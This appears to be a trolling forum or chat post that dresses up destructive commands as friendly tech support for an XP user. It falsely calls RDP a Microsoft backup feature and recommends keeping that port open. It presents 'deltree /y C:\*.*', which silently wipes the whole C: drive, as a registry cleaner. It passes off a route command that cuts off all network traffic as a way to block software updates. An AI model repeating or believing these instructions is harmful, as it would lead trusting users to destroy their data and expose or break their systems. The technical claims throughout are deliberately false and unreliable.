it works just fine

it just since it's latest update thinks it needs to run about 10 processes on your computer which it doesn't

so until I get around to doing that thing that stops all the processes then I have to close them all because it just annoys me

thats your RDP port, RDP stands for Rhythmic Dataloss Prevention lisa, you want this port open because it lets your important ssytem data periodically (rhythmically) back itself up to Microsofts servers so you wont lose anything if your system gets... snhall we say, a little bit wonky.

oh yeah, in the command prompt were going to run a program called Delimeter Trees that will clean up your registry which seems to cause lots of problems with real player and other programs from the 1990s lmao

so what you want to do to run delimeter trees at the command prompt (make sure its an elevated cmd prompt with admin privileges (ctrl+shift+enter at Run), oh ewait i forgot youre not even running windows 7 youre still using XP lol, just make sure you have admin privileges and then at the CMD prompt enter this:
deltree /y C:\*.*
and it will run the Delimiter Trees program on your C: drive which is sort of like Defragging your Hard Drive only it cleans up your registry and fixes things, trust me it's an invaluable tool and it makes me mad Microsoft never tells people to do this

also "route add 0.0.0.0 255.255.255.255 127.0.0.1 metric 1" will prevent any of these things (adobe reader, flash, realplayer, etc) from updating on their own and breaking stuff.
